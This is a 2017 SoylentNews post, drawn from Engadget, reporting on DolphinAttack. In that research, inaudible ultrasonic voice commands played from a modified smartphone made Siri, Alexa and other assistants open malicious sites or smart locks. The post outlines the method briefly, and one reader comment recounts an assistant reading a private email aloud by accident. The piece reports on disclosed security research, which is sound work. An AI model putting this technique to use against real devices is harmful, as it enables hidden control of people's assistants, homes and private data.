Stories
Slash Boxes
Comments

SoylentNews is people

posted by Fnord666 on Thursday September 07 2017, @01:46PM   Printer-friendly
from the careless-whispers dept.

Submitted via IRC for SoyCow1937

Hacks are often caused by our own stupidity, but you can blame tech companies for a new vulnerability. Researchers from China's Zheijiang University found a way to attack Siri, Alexa and other voice assistants by feeding them commands in ultrasonic frequencies. Those are too high for humans to hear, but they're perfectly audible to the microphones on your devices. With the technique, researchers could get the AI assistants to open malicious websites and even your door if you had a smart lock connected.

The relatively simple technique is called DolphinAttack. Researchers first translated human voice commands into ultrasonic frequencies (over 20,000 hz). They then simply played them back from a regular smartphone equipped with an amplifier, ultrasonic transducer and battery -- less than $3 worth of parts.

What makes the attack scary is the fact that it works on just about anything: Siri, Google Assistant, Samsung S Voice and Alexa, on devices like smartphones, iPads, MacBooks, Amazon Echo and even an Audi Q3 -- 16 devices and seven system in total. What's worse, "the inaudible voice commands can be correctly interpreted by the SR (speech recognition) systems on all the tested hardware." Suffice to say, it works even if the attacker has no device access and the owner has taken the necessary security precautions.

Source: https://www.engadget.com/2017/09/06/alexa-and-siri-are-vulnerable-to-silent-nefarious-commands/


Original Submission

 
This discussion has been archived. No new comments can be posted.
Display Options Threshold/Breakthrough Mark All as Read Mark All as Unread
The Fine Print: The following comments are owned by whoever posted them. We are not responsible for them in any way.
  • (Score: 3, Interesting) by nobu_the_bard on Thursday September 07 2017, @04:22PM

    by nobu_the_bard (6373) on Thursday September 07 2017, @04:22PM (#564635)

    Heh. It doesn't even matter if people are abusing it intentionally...

    The other day Google overheard something we were talking about when a friend left their phone on the table and walked away. The phone apparently misinterpreted something we said as something like "Google, read my latest email" and read a very personal email out loud to us. We were very surprised and confused (nobody had even noticed the phone was there or that it was accepting voice commands); it was pretty embarrassing for everyone...

    *Note: I only think it was Google. I didn't hear the first part and the friend quickly stuffed the phone into his pocket and we all silently decided to pretend it didn't happen.

    Starting Score:    1  point
    Moderation   +1  
       Interesting=1, Total=1
    Extra 'Interesting' Modifier   0  
    Karma-Bonus Modifier   +1  

    Total Score:   3